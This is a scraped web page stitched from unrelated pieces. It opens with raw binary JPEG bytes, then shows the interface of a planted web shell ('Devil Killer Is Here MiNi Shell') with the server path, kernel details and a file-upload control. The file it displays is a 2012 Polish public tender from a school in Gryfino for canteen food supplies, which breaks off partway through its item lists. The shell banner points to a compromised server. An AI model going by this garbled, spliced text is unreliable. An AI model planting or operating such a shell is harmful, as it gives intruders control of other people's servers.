JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121204/489478-N-2012.html

<p class="kh_header"><b>Gryfino: ZAKUP  I  DOSTAWA  ARTYKUŁÓW  ŻYWNOŚCIOWYCH NA POTRZEBY STOŁÓWKI SZKOLNEJ W ROKU 2013</b><br>
<b>Numer ogłoszenia: 489478 - 2012; data zamieszczenia: 04.12.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół , ul. Iwaszkiewicza 70, 74-101 Gryfino, woj. zachodniopomorskie, tel. 91 415 10 25, faks 91 416 47 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsgryfino.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka oświatowa utworzona przez JST.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP  I  DOSTAWA  ARTYKUŁÓW  ŻYWNOŚCIOWYCH NA POTRZEBY STOŁÓWKI SZKOLNEJ W ROKU 2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa produktów spożywczych na potrzeby stołówki szkolnej, niezbędnych do sporządzania posiłków w roku 2013. Zakres i wielkość zamówienia: 
1	Cukier  1 kg	szt	600
2	Mąka pszenna typ 405  1 kg	szt	500
3	Kasza jęczmienna  1 kg	szt	50
4	Kasza jęczmienna karton     400g	szt	600
5	Kasza pęczak   1 kg	szt	80
6	Ryż karton   400g	szt	1400
7	Kasza manna  1 kg	szt	25
8	Ryż 1 kg	szt	100
9	Sól    1 kg	szt	350
10	Bułka tarta   0,5kg	szt	600
11	Makaron nitki    1kg	szt	750
12	Makaron świderki   1kg	szt	250
13	Makaron spagetti    400g                                      	szt	300
14	Mąka ziemniaczana   1kg	szt	60
15	Makaron łazanka            0,5kg	szt	250
16	Makaron  literki               250g	szt	300
17	Makaron  zacierka           250g	szt	400
18	Makaron  kokardy           500g	szt	150
19	Makaron  wstążki            500g	szt	50
20	Makaron  rurka  cięta      500g	szt	50
21	Makaron  gwiazdki         250g	szt	50
22	Makaron  baranek           400g	szt	50
23	Makaron wstążki M13    1 kg	szt	150
24	Kasza  gryczana              400g	szt	200
25	Papryka słodka                   	kg	5
26	Pieprz mielony  1kg	szt	5
27	Majeranek   100g	szt	50
28	Liść laurowy  100g	szt	10
29	Ziele angielskie     100g	szt	10
30	Kwasek cytrynowy   1kg	szt	1
31	Przyprawa Warzywko   1kg (lub równoważne)	szt	150
32	Groszek konserwowy   400g	szt	50
33	Kukurydza konserwowa   400g	szt	100
34	Koncentrat pomidorowy    1kg 	szt	180
35	Szczaw konserwowy    330g	szt	90
36	Majonez  dekoracyjny Winiary  700g (lub równoważne)	szt	150
37	Musztarda    200g	szt	100
38	Fasola Jaś                    	kg	150
39	Groch łuskany                     	kg	80
40	Czosnek granulowany         	kg	0,5
41	Przyprawa w płynie Knorr   1040g (lub równoważne)	szt	45
42	Chrzan  tarty  słoik   200g	szt	100
43	Olej  rzepakowy      3l                              	szt	500
44	Żurek  Knorr      3kg   (lub równoważne)	szt	15
45	Przyprawa do mięs    200g	szt	100
46	Cukier puder    400g	szt	20
47	Galka muszkatołowa      100g	szt	10
48	Barszcz biały   Knorr     1kg  (lub równoważne)	szt	15
49	Pieprz czarny ziarnisty    1kg	szt	12
50	Kminek      100g	szt	10
51	Tymianek      100g	szt	15
52	Sos sałatkowy     500g	szt	10
53	Zioła prowansalskie      100g	szt	20
54	Bazylia     100g	szt	20
55	Sól peklowa      0,5 kg	szt	10
56	Dżem jagodowy    440g	szt	100
57	Dżem truskawkowy    440g	szt	200
58	Dżem wiśniowy   440g	szt	200
59	Sok cytrynka     0,5 l	szt	150
60	Fasola drobna       1kg	szt	60
61	Fasola Jaś      1kg	szt	80
62	Papryka  konserwowa krojona     5l	szt	30
63	Papryka konserwowa      660 g	szt	150
64	Ogórki  konserwowe     900 ml	szt	350
65	Ocet  jabłkowy      0,5l	szt	30
66	Dżem porzeczkowy       440g	szt	100
67	Sos boloński	kg	25
68	Sałatka  szwedzka    3l	szt	50
69	Pomidor b/s   puszka     3l	szt	30
70	Ketchup       1l	szt	100
71	Śliwki suszone       200g	szt	20
72	Ocet 10%       0,5l	szt	50
73	Syrop owocowy       3l	szt	350
74	Papryka ostra	kg	0,5
75	Cukier waniliowy      32g	szt	50
76	Miód naturalny    1l	szt	3
77	Rodzynki      100g	szt	30
78	Płatki migdałowe       100g	szt	30
79	Sos sojowy       640ml	szt	3
80	Ananas   kawałki      565g	szt	120
81	Brzoskwinie  puszka   850g	szt	90
82	Kompot wiśniowy      0,9 l	szt	300
83	Kompot truskawkowy    0,9 l	szt	300
84	Kompot z czarnej porzeczki   0,9 l	szt	300
85	Ziemniaki	kg	17000
86	Ziemniaki młode	kg	800
87	Jajka świeże duże 65-70g	szt	10000
88	Mleko  3,2%     karton       1l	szt	350
89	Śmietana 12%      0,5 l       	szt	1200
90	Śmietana 18%      1kg	szt	1400
91	Jogurt naturalny      3kg	szt	300
92	Maślanka     1l	szt	60
93	Jogurt  owocowy     125g	szt	2500
94	Masło ekstra     200g	szt	300
95	Margaryna  Kasia  250g  (lub równoważne)	szt	300
96	Twaróg     1 kg	kg	300
97	Ser żółty Gouda	kg	120
98	Marchew	kg	2000
99	Cebula	kg	1000
100	Pietruszka korzeń	kg	500
101	Seler korzeń	kg	500
102	Buraki	kg	900
103	Kapusta biała	kg	1000
104	Kapusta czerwona	kg	500
105	Kapusta pekińska	kg	600
106	Pomidory	kg	250
107	Ogórek świeży                  	kg	500
108	Por   	kg	650
109	Kapusta kiszona	kg	950
110	Ogórek kiszony	kg	350
111	Jabłka	kg	600
112	Szczypior	pęczek	50
113	Sałata	szt	400
114	Papryka świeża  kolorowa	kg	250
115	Pieczarki	kg	300
116	Kalarepa świeża 	szt	100
117	Truskawki świeże	kg	100
118	Rzodkiew  biała	kg	100
119	Boćwina	pęczek	100
120	Kalafior  świeży	szt	50
121	Koper	pęczek	1200
122	Natka	pęczek	1000
123	Rzodkiewka 	pęczek	250
124	Brokuły  świeże	szt	100
125	Cukinia 	kg	40
126	Czosnek  świeży  polski	szt	200
127	Kapusta  włoska	szt	150
128	Fasola szparagowa  żółta	kg	50
129	Szczaw  świeży	pęczek	200
130	Fasolka  szparagowa  zielona	kg	50
131	Banany 	kg	300
132	Mandarynki 	kg	100
133	Sałata lodowa	szt	700
134	Cebula czerwona	kg	50
135	Filet z mintaja bez glazury SHP	kg	750
136	Filet z łososia	kg	30
137	Filet z dorsza  czarniaka bez glazury SHP	kg	250
138	Paluszki  rybne z fileta z mintaja  o zawartości mięsa rybiego co najmniej50%	kg	500
139	Kiełbasa podlaska wieprzowa 	kg	50
140	Wołowina zrazowa	kg	50
141	Antrykot wołowy	kg	40
142	Karkówka wieprzowa surowa b/k	kg	550
143	Szynka wieprzowa surowa b/k	kg	300
144	Kości wieprzowe z karkówki i schabu	kg	500
145	Kości wędzone	kg	250
146	Łopatka b/k	kg	1200
147	Schab  b/k	kg	650
148	Boczek  wędzony  bez żeberek	kg	50
149	Żeberka  świeże paski	kg	50
150	Boczek  świeży bez żeberek	kg	30
151	Kurczak świeży                   	kg	50
152	Filet z indyka	kg	100
153	Filet z kurczaka	kg	1000
154	Udka z kurczaka	kg	1000
155	Udo z indyka	kg	300
156	Szyje z indyka	kg	20
157	Skrzydła z indyka	kg	20
158	Porcje rosołowe	kg	800
159	Korpusy  z  indyka	kg	200
160	Kiełbasa drobiowa z fileta	kg	250
161	Kiełbasa śląska  z drobiu	kg	350
162	Fasola szparagowa      2,5kg	kg	100
163	Kalafior    2,5kg	kg	100
164	Brokuły     2,5kg	kg	100
165	Truskawki    2,5kg	kg	50
166	Brukselka     2,5kg	kg	150
167	Mieszanka chińska    2,5kg	kg	100
168	Wiśnie bez pestek      2,5kg	kg	50
169	Śliwki bez pestek      2,5 kg	kg	50
170	Jagoda     2,5kg	kg	50
171	Bułki  drożdżowe na  parze      700g	szt	500
172	Chleb krojony pszenny   500g          	szt	650
173	Bułki  małe	szt	200
174	Chleb  razowy    700g	szt	450
175	Bułka  bagietka     300g	szt.	900
176	Pączki 	szt	360
177	Drożdżówki 	szt	360.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.00.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art.22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art.22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art.22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art.22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Każdy wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego zobowiązany jest do złożenia oświadczenia zgodnie z art.22 ust. 1 ustawy Prawo zamówień publicznych</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca dołączy do oferty następujące dokumenty:
1) formularz oferty - wzór oferty stanowi załącznik Nr 1 do specyfikacji istotnych warunków zamówienia,
2) odpowiednie pełnomocnictwa - w sytuacjach określonych w rozdz. IX pkt 6 specyfikacji istotnych warunków zamówienia oraz w przypadku składania ofert wspólnych,
3) oświadczenie o równoważności produktów wraz z opisem - w przypadku składania ofert równoważnych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsgryfino.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> sekretariat Zespołu Szkół ul. Iwaszkiewicza 70, 74-101 Gryfino.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.12.2012 godzina 11:00, miejsce: Sekretariat Zespołu Szkół ul. Iwaszkiewicza 70, 74-101 Gryfino.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przetwory sypkie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wielkość i zakres zamówienia
Cukier  1 kg	szt	600
Mąka pszenna typ 405  1 kg	szt	500
Kasza jęczmienna  1 kg	szt	50
Kasza jęczmienna karton     400g	szt	600
Kasza pęczak   1 kg	szt	80
Ryż karton   400g	szt	1400
Kasza manna  1 kg	szt	25
Ryż 1 kg	szt	100
Sól    1 kg	szt	350
Bułka tarta   0,5kg	szt	600
Makaron nitki    1kg	szt	750
Makaron świderki   1kg	szt	250
Makaron spagetti    400g                                      	szt	300
Mąka ziemniaczana   1kg	szt	60
Makaron łazanka            0,5kg	szt	250
Makaron  literki               250g	szt	300
Makaron  zacierka           250g	szt	400
Makaron  kokardy           500g	szt	150
Makaron  wstążki            500g	szt	50
Makaron  rurka  cięta      500g	szt	50
Makaron  gwiazdki         250g	szt	50
Makaron  baranek           400g	szt	50
Makaron wstążki M13    1 kg	szt	150
Kasza  gryczana              400g	szt	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.83.00.00-5, 15.61.00.00-7, 15.85.11.00-9, 15.87.24.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przyprawy, przetwory, produkty strączkowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres i wielkość zamówienia:
Papryka słodka                   	kg	5
Pieprz mielony  1kg	szt	5
Majeranek   100g	szt	50
Liść laurowy  100g	szt	10
Ziele angielskie     100g	szt	10
Kwasek cytrynowy   1kg	szt	1
Przyprawa Warzywko   1kg (lub równoważne)	szt	150
Groszek konserwowy   400g	szt	50
Kukurydza konserwowa   400g	szt	100
Koncentrat pomidorowy    1kg 	szt	180
Szczaw konserwowy    330g	szt	90
Majonez  dekoracyjny Winiary  700g (lub równoważne)	szt	150
Musztarda    200g	szt	100
Fasola Jaś                    	kg	150
Groch łuskany                     	kg	80
Czosnek granulowany         	kg	0,5
Przyprawa w płynie Knorr   1040g (lub równoważne)	szt	45
Chrzan  tarty  słoik   200g	szt	100
Olej  rzepakowy      3l                              	szt	500
Żurek  Knorr      3kg   (lub równoważne)	szt	15
Przyprawa do mięs    200g	szt	100
Cukier puder    400g	szt	20
Galka muszkatołowa      100g	szt	10
Barszcz biały   Knorr     1kg  (lub równoważne)	szt	15
Pieprz czarny ziarnisty    1kg	szt	12
Kminek      100g	szt	10
Tymianek      100g	szt	15
Sos sałatkowy     500g	szt	10
Zioła prowansalskie      100g	szt	20
Bazylia     100g	szt	20
Sól peklowa      0,5 kg	szt	10
Dżem jagodowy    440g	szt	100
Dżem truskawkowy    440g	szt	200
Dżem wiśniowy   440g	szt	200
Sok cytrynka     0,5 l	szt	150
Fasola drobna       1kg	szt	60
Fasola Jaś      1kg	szt	80
Papryka  konserwowa krojona     5l	szt	30
Papryka konserwowa      660 g	szt	150
Ogórki  konserwowe     900 ml	szt	350
Ocet  jabłkowy      0,5l	szt	30
Dżem porzeczkowy       440g	szt	100
Sos boloński	kg	25
Sałatka  szwedzka    3l	szt	50
Pomidor b/s   puszka     3l	szt	30
Ketchup       1l	szt	100
Śliwki suszone       200g	szt	20
Ocet 10%       0,5l	szt	50
Syrop owocowy       3l	szt	350
Papryka ostra	kg	0,5
Cukier waniliowy      32g	szt	50
Miód naturalny    1l	szt	3
Rodzynki      100g	szt	30
Płatki migdałowe       100g	szt	30
Sos sojowy       640ml	szt	3
Ananas   kawałki      565g	szt	120
Brzoskwinie  puszka   850g	szt	90
Kompot wiśniowy      0,9 l	szt	300
Kompot truskawkowy    0,9 l	szt	300
Kompot z czarnej porzeczki   0,9 l	szt	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.87.00.00-7, 15.33.00.00-0, 15.40.00.00-2, 15.89.10.00-0, 15.84.00.00-8, 03.21.22.00-2, 15.83.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ziemniaki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wielkość i zakres zamówienia:
Ziemniaki	kg	17000
Ziemniaki młode	kg	800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.21.21.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres i wielkość zamówienia:
Jajka świeże duże 65-70g	szt	10000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Warzywa, owoce, kiszonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres i wielkość zamówienia:
Marchew	kg	2000
Cebula	kg	1000
